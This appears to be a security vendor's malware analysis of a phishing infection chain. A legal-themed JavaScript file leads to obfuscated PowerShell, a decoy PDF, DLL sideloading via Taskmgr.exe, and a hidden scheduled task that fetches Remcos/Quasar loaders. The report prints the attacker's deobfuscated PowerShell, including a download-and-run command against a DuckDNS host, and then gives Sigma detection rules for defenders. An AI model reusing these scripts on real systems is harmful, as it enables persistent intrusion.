REQUEST A DEMO
Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.
Our team discovered an infection chain originating from a legal-themed JavaScript file. Its execution launches a series of PowerShell processes using obfuscated scripts while opening a decoy PDF to distract the user. In the background, the threat actor creates staging directories for malicious payloads and retrieves them for execution within a trusted context using DLL sideloading.
The chain ultimately delivers a Python-based implant responsible for retrieving, executing, and orchestrating Remcos and Quasar Remote Access Trojans (RATs). The implant enables remote command execution, payload retrieval, and system reconnaissance, providing the threat actor with a stable and reusable foothold on the compromised host. Observed behaviors, including modular payload delivery and persistent access mechanisms, are consistent with initial access broker (IAB) activity, significantly increasing the overall risk as such access is commonly sold to other threat actors for follow-on operations, including data exfiltration and ransomware deployment.
The following steps outline the full execution flow of the infection chain from initial user execution to persistence and payload delivery, which will be further discussed in the analysis:
Taskmgr.exe to load malicious dxgi.dllwindowsupdateshare.duckdns[.]orgC:\\Users\\Public\\
Analysis into this infection chain began after coming across a suspicious JavaScript file in sandbox reporting. The file was found to be dropping a payload named “dxgi.dll”, which matched tactics previously observed from a threat actor under investigation. The script was not relevant to the investigation, but preliminary analysis revealed an obfuscated infection chain that our team flagged for further analysis. The file uses the default .js extension and is named to appear as a legal document the user must review.
The original delivery vector was not identified. However, the legal-themed filename strongly suggests phishing as the most likely delivery mechanism, as similar naming conventions are commonly used in email lures. The objective of this infection chain is to establish persistent remote access to victim systems, likely targeting both individuals and organizational environments. Legal-themed lures are frequently used in broad phishing campaigns due to their ability to generate urgency and achieve high engagement across a wide range of targets.
The script is heavily obfuscated. Rather than performing a lengthy static analysis, our team leveraged dynamic analysis to identify its behavior and related processes:
Once executed, the script launches a series of obfuscated PowerShell scripts using powershell.exe to execute large Base64-encoded command blocks. Initial execution occurs in memory through PowerShell-based decoding and command execution, but quickly transitions to on-disk activity where multiple payload components are staged, written, and executed. Obfuscation is achieved through extremely long variable names, often exceeding 255 characters, and Base64 encoded strings containing fragments of the additional payloads. Manual decoding of these strings and replacement of the obfuscated variable names allowed for static analysis of the fully readable scripts.
Our analysis revealed four primary goals for the PowerShell execution. First, the commands create and launch a decoy PDF in the C:\\Users\\Public directory, likely to distract the user while the remaining stages of the infection chain execute in the background.
# Create the decoy PDF
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
$A = [SyStem.COnVeRT]::FromBase64String('BASE64 STRING');
$B = [SYsTem.IO.fILE]::Open($eNV:PUBLIC + '\FAIYESYE20260303783763.pdf', [SystEm.iO.fiLEmOde]::Create, [SystEm.IO.filEaCcesS]::Write);
$B.Write($A, 0, $A.Length); $B.Close()""
# Launch the deocy PDF
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
$Dummy9 = $Dummy10;
$C = $ENV:PUBLIC + '\FAIYESYE20260303783763.pdf';
saps $C;
$Dummy11 = $Dummy12""
Second, the commands create a staging directory designed to mimic legitimate Windows system paths, providing a controlled location for payload deployment and execution. A legitimate Microsoft binary (in this case,Taskmgr.exe) is also copied into this directory to facilitate DLL sideloading in later stages of the infection chain.
# Create staging dir using similar windows dir names
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
$Dummy13 = $Dummy14;
$D = [SyStem.IO.DireCtoRy]::CreateDirectory('\\?\C:\Windows ');
$F = [SyStem.IO.DireCtoRy]::CreateDirectory('\\?\C:\Windows \System32');
$Dummy15 = $Dummy16""
# Copy legitimate binary to staging dir (taskmgr in this case)
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
$Dummy17 = $Dummy18;
Copy-Item -Path 'C:\Windows\System32\Taskmgr.exe' -Destination 'C:\Windows \System32\Taskmgr.exe' -Force;
$Dummy19 = $Dummy20""
Third, the scripts reconstruct and write additional payload components to disk, including the malicious dxgi.dll library and a helper batch script named kdeco.bat, both assembled from Base64 encoded fragments embedded within the PowerShell commands.
# Write chunk of dxgi.dll
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
$S = [SyStem.COnVerT]::FromBase64String('BASE64 STRING');
$T = [sYSTem.iO.fILe]::Open('C:\Windows \System32\dxgi.dll', [SysTeM.io.fILeMODe]::Append, [SyStEM.IO.FileaCCesS]::Write);
$T.Write($S, 0, $S.Length);
$T.Close()""
...
# Additional writes to dxgi.ll (7 total)
...
# Write kdeco.BAT payload
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
$U = [sYstEm.CoNvERt]::FromBase64String('BASE64 STRING');
$V = [sYStEM.Io.fiLe]::Open('C:\Windows \System32\KDECO.bat', [sYsTEm.io.fileMODe]::Create, [SysTEM.iO.FIlEaCcess]::Write);
$V.Write($U, 0, $U.Length);
$V.Close()""
Finally, the execution chain triggers a DLL sideloading mechanism by searching for the staged Taskmgr.exe binary within the fake directory and executing it. This causes the malicious
dxgi.dll to be loaded and executed. During execution, Taskmgr.ex triggered a standard User Account Control (UAC) prompt requesting permission to make system changes. This indicates elevation is achieved through user interaction rather than a silent UAC bypass, with the binary name likely used to increase user trust and improve the likelihood of approval.
# Find and execute Taskmgr.exe with Sideloaded dxgi.dll payload
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $DUMMY21 = $DUMMY22 = $DUMMY23;
$AA = 'C:\Windows \System32'; Get-ChildItem -Path $AA -Filter '*Taskmgr.exe' | ForEach-Object { & $_.FullName };
$DUMMY24 = $DUMMY25""
Although dxgi.dll was not fully reverse engineered, observed execution behavior indicates it serves as a transitional loader within the infection chain. Behavioral analysis provides high confidence in this assessment, and no additional payload stages beyond word.exe were observed during execution. The DLL is executed through sideloading via Taskmgr.exe, enabling it to run under a trusted process and evade detection. Its execution leads directly to the invocation of kdeco.bat, confirming its role in bridging initial PowerShell execution with subsequent stages of the infection.
Analysis of kdeco.bat shows it creates a hidden scheduled task named WindowsDefinitionUpdate under \\Microsoft\\Windows\\WindowsUpdate using the Task Scheduler COM object to establish persistence while masquerading as a legitimate Windows Update job. The task is configured to run daily with the highest available privileges (RunLevel = 1) and is hidden from the user. Its action executes a PowerShell command that downloads a payload from attacker-controlled infrastructure to C:\\Users\\Public\\word.exe and immediately runs it. This ensures word.exe is repeatedly retrieved and executed, providing durable persistence and a reliable method for the threat actor to maintain or refresh the next stage of the infection.
#kdeco.bat
powershell.exe ""
$A = 'WindowsDefinitionUpdate'
$B = '\Microsoft\Windows\WindowsUpdate'
$C = New-Object -ComObject 'Schedule.Service'
$C.Connect()
$D = $C.GetFolder($B)
$E = $C.NewTask(0)
$E.RegistrationInfo.Description = 'Ensures Windows Update is correctly configured for this device'
$E.Principal.LogonType = 3
$E.Principal.RunLevel = 1
$E.Settings.Hidden = $true
$E.Settings.DisallowStartIfOnBatteries = $false
$E.Settings.StopIfGoingOnBatteries = $false
$E.Settings.StartWhenAvailable = $true
$F = $E.Triggers.Create(2)
$F.StartBoundary = '2023-08-09T08:10:00'
$F.Enabled = $true
$F.DaysInterval = 1
$G = $E.Actions.Create(0)
$G.Path = 'cmd.exe'
$G.Arguments = '/c powershell.exe -windowstyle hidden Invoke-WebRequest http://windowsupdateshare.duckdns.org/secure/find -Outfile C:\Users\Public\word.exe; Start-Process -NoNewWindow -FilePath C:\Users\Public\word.exe'
$D.RegisterTaskDefinition($A, $E, 6, $null, $null, 3)
""
Successful execution of this infection chain results in the installation and persistence of a secondary payload, providing the threat actor with reliable, repeated access to the compromised host. At this stage, the system should be considered fully compromised, as the attacker is able to execute arbitrary commands and deploy additional tooling without further user interaction.
This level of access enables a range of follow-on activities, including data collection, credential theft, and additional payload delivery. The presence of this access also introduces risk of escalation to more disruptive operations, such as ransomware deployment, depending on operator intent. This structured execution flow enables reliable initial access and persistence while minimizing user awareness, making it well-suited for follow-on operations and potential access resale.
These detections focus on high-confidence anomalies, including DLL sideloading, abuse of trusted Windows paths, and PowerShell commands retrieving remote payloads, providing reliable coverage of the infection chain with minimal false positives.
The infection chain relies on staging directories masquerading as legitimate Windows directories, providing an opportunity for detection.
title: Suspicious Windows Directory With Trailing Space
logsource:
category: file_event
product: windows
detection:
selection:
TargetFilename|contains: 'C:\Windows '
condition: selection
fields:
- TargetFilename
- Image
falsepositives:
- None expected
level: high
The final PowerShell command is responsible for retrieving and scheduling execution of the final payload. While the -windowstyle hidden and Invoke-WebRequest flags may be used in legitimate contexts, the combination of the two is suspicious and warrants investigation.
title: Hidden PowerShell Invoke-WebRequest Execution
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
- 'powershell'
- '-windowstyle hidden'
- 'Invoke-WebRequest'
condition: selection
fields:
- CommandLine
level: high
DuckDNS is a legitimate dynamic DNS service, but it is often leveraged by threat actors to host and rotate malicious infrastructure used in phishing and payload delivery. Blanket blocking of DuckDNS domains may impact legitimate use cases, making it an impractical control in some environments. This rule improves detection fidelity by correlating DuckDNS network activity with suspicious Invoke-WebRequest from PowerShell processes.
title: PowerShell Downloads From DuckDNS Domain
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
- 'Invoke-WebRequest'
- '.duckdns.org'
condition: selection
fields:
- CommandLine
falsepositives:
- Very rare
level: high
The true taskmgr.exe binary is located at C:\Windows\System32\taskmgr.exe . Execution of this binary from any other location is a strong indicator of malicious activity.
title: Taskmgr Executed Outside System32
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\Taskmgr.exe'
filter:
Image|contains: 'C:\Windows\System32\Taskmgr.exe'
condition: selection and not filter
fields:
- Image
- CommandLine
level: high
The word.exe binary represents the final stage of the infection chain and serves as the primary payload delivered to the victim system. At this point, the attacker has successfully transitioned from initial execution to a stable foothold, leveraging DLL sideloading for trusted execution and a scheduled task for persistent access. The use of legitimate system paths, signed binaries, and staged payload reconstruction demonstrates a deliberate effort to evade detection while maintaining reliability across executions. This type of infection chain is commonly used by initial access brokers, indicating a high likelihood of follow-on activity such as data theft or ransomware deployment if not remediated.
This infection chain reflects a structured and repeatable delivery mechanism designed to establish long-term access with minimal user awareness. By the time word.exe is executed, all prerequisite conditions for persistence, defense evasion, and payload recovery have been met, allowing the threat actor to operate on the host without requiring further user interaction. Further analysis of the final payload, including command and control behavior, data collection, and post-exploitation capabilities, will be covered in a follow-on report.
Initial Access (TA0001)
Execution (TA0002)
Defense Evasion (TA0005)
C:\\Windows )dxgi.dll via a legitimate binary (Taskmgr.exe)Persistence (TA0003)
WindowsDefinitionUpdate) for recurring executionCommand and Control (TA0011)
word.exe) from attacker-controlled infrastructureImpact / Follow-on Activity (TA0040)